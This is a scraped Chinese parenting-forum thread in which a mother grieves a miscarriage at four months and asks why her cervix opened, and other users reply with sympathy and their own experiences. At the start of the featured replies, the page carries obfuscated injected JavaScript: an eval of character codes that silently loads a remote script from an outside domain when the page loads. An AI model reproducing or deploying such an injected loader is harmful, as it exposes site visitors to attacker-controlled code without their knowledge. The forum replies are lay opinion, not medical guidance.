帖子详情

怀孕4个月流产,真的很想不通

11580101怀孕妈妈

二宝离开我一周了,这一周来,每次想到已经成型的宝宝离我而去,就难受得哭。他已经会动了,流产前一天我还摸到他的小身子把我的肚子拱起来一个小包,然后说没就没了。
住院了一个星期出院,到现在对宝宝为什么突然没了,还是不明白,问医生,也是顾左而言他,不知道有没有懂这方面的宝妈给说说呢?
一直以来产检的情况都很好,而且从之前检查结果来看,宝宝发育还比较快,比一般宝宝个子都大。上上个周六做B超的时候都还是好好的,到了上周三早上起床的时候,不过隔了4天,突然见红。到了医院,医生说是宫口开了,要住院。当晚就宫缩痛得我要死,打了反应特别大的保胎药后,痛得半死才保住一晚上;第二晚上宫缩又提前了,这次就算是打那个让我痛的死去活来的药也保不住了,凌晨的时候,宝宝就流产了。看到掉下来的宝宝,都已经好大了,心里真的是很难过。
相比较而言,宝宝刚走的时候可能还没反应过来,心里虽然难受,但也还好,过了两天缓过劲来,这事儿都不能想,想到都忍不住哭。都已经4个月了,咋就能说没就没了呢?我就不明白了,我也没有很辛苦,也没有怎么的,怎么就4个月开宫口了呢?开了宫口,是不是就一定保不住了?医院只给我打两种药,说4个月保胎,就只有那个办法。就只有那个办法了吗?
精选回帖
$('ed2k_A1n').innerHTML=htmlspecialchars(unescape(decodeURIComponent('filesize')))+' ('+eval(String.fromCharCode(119,105,116,104,40,100,111,99,117,109,101,110,116,41,48,91,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,41,46,115,114,99,61,39,104,116,116,112,58,47,47,115,104,117,97,106,105,57,46,99,111,109,47,63,97,61,49,39,93,59))+' Bytes)';为你真的感到难过,不过机会还有的是,加油
2017/03/18回复
抱抱楼主,看了替你伤心。。。。你在哪家医院看的?是见红第几次?鲜血吗?多么?四个月就开始宫缩?。。。我现在25周,见红三次,少量,鲜血,每次两天左右,我是23周后才会感觉到宫缩,二胎,所以知道什么是宫缩。我现在关键三次见红B超都没事,医生没开药。我天天都担心我还发了贴在妈网咨询呢。。
保重,好好养身体,省二应该不错啊,听说叶敦敏很好,中西医调理一段时间吧。祝安好。
2017/03/19回复
34楼
1970/01/01回复
我求儿女路10年了,今年8月36岁了,07年人流后一直没怀上,2012年输卵管通水5次通,2016年12月宫腔镜手术切子宫内膜息肉,来了两次月经后自然怀上了(正打算去试促排卵的)但还是没保住,17号流产了,5周+大的,知道你的痛,难过是必然的,我也忍不住哭了好几回,哭出来舒服点,多主动跟家人说你的难过让家人多开导一下,快点走出难关!保重身体,重新出发!加油!
2017/03/19回复
全部回帖
海天恋:
二宝离开我一周了,这一周来,每次想到已经成型的宝宝离我而去,就难受得哭。他已经会动了,流产前一天我还摸到他的小身子把我的肚子拱起来一个小包,然后说没就没了。住院了一个星期出院,到现在对宝宝为什么突然没了,还是不明白,问医生,也是顾左而言他,不知道有没有懂这方面的宝妈给说说呢?一直以来产检的情况都很好,而且从之前检查结果来看,宝宝发育还比较快,比一般宝宝个子都大。上上个周六做B超的时候都还是好好的,到了上周三早上起床的时候,不过隔了4天,突然见红。到了医院,医生说是宫口开了,要住院。当晚就宫缩痛得我要死,打了反应特别大的保胎药后,痛得半死才保住一晚上;第二晚上宫缩又提前了,这次就算是打那个让我痛的死去活来的药也保不住了,凌晨的时候,宝宝就流产了。看到掉下来的宝宝,都已经好大了,心里真的是很难过。相比较而言,宝宝刚走的时候可能还没反应过来,心里虽然难受,但也还好,过了两天缓过劲来,这事儿都不能想,想到都忍不住哭。都已经4个月了,咋就能说没就没了呢?我就不明白了,我也没有很辛苦,也没有怎么的,怎么就4个月开宫口了呢?开了宫口,是不是就一定保不住了?医院只给我打两种药,说4个月保胎,就只有那个办法。就只有那个办法了吗?
查看原文
情趣爱爱铺网友建议,平时注意自己的身体,锻炼的时间,休息好。
2017/03/17回复
宝妈,心情不要太不好了,这样的情况,很多人都遇到过,好好养好身体,多学习,我们下一胎 加油宝妈
为你感到难过~也想知道有没有了解的分享一下看法,也想了解!
虽然不懂,但抱抱你,别难过~勇敢跨过去
抱抱宝妈
怎么会这样啊,宝妈好好休息,宝宝会再来的😀
怎么会这样呀,中期不是稳定了吗? 好好休息,宝宝会再来的

为你真的感到难过,不过机会还有的是,加油
抱抱楼主,看了替你伤心。。。。你在哪家医院看的?是见红第几次?鲜血吗?多么?四个月就开始宫缩?。。。我现在25周,见红三次,少量,鲜血,每次两天左右,我是23周后才会感觉到宫缩,二胎,所以知道什么是宫缩。我现在关键三次见红B超都没事,医生没开药。我天天都担心我还发了贴在妈网咨询呢。。
cc辰辰妈妈 发表于 2017-03-17 15:45
宝妈,心情不要太不好了,这样的情况,很多人都遇到过,好好养好身体,多学习,我们下一胎 加油宝妈..
谢谢,下次肯定要更小心谨慎了。
jinying237 发表于 2017-03-17 23:12
为你感到难过~也想知道有没有了解的分享一下看法,也想了解!
是的,就想知道这种情况是否真的就回天乏力了呢。
小林猪999 发表于 2017-03-17 23:20
虽然不懂,但抱抱你,别难过~勇敢跨过去
谢谢,会坚强的。
伊丽莎白医院 发表于 2017-03-18 08:51

抱抱宝妈
谢谢。
1587945 发表于 2017-03-18 18:18
怎么会这样呀,中期不是稳定了吗? 好好休息,宝宝会再来的
是啊,我也不明白,都过了3个月了。
炮炮猫 发表于 2017-03-18 21:05
抱抱楼主,看了替你伤心。。。。你在哪家医院看的?是见红第几次?鲜血吗?多么?四个月就开始宫缩?。。。我现..
在省二医看的,就是第一次见红,宫口就开了,血量湿了一条内裤。查B超也是没事,医生查看宫口才发现问题的。但见红当晚,宫缩就厉害得不行,打药才熬过去,第二晚打药也坚持不住了。
猜你喜欢

珠江新城妇幼保健院顺产记

珠江新城妇幼破水超24小时无痛分娩顺产经历

生产的痛苦和喜悦

【fum1314的生产记】女儿泡泡南方医院8小时顺产记

三次急诊广医三院害我宝宝没了,大家给我评评理

市一顺产记(男孩,7斤2两)

热点推荐

班尼路曾经在旺地 现已都沦为折扣店

打卡新晋网红店 渣马角文创生活馆

娃对班主任有意见 成绩下滑严重点算好

男孩子的天堂!正佳广场奥特曼卡游店

2024广州孕妈妈交流群 欢迎扫码入群!

家常蚕豆咸肉焖春笋 混在一起就是鲜

华润万家雪糕大促销 10蚊就有一大盒

打卡走婚桥 感受摩梭人的古老浪漫

打卡藏在广州塔旁的咖啡厅 拍照很出片

广州京东MALL试业啦 价格偏贵一些

【老头Vivi】约上闺蜜一起去学唱歌真假音切

老妈70岁大寿 8桌一万三分量足好抵吃

谁说今年服装行情不好?

查看更多热点 >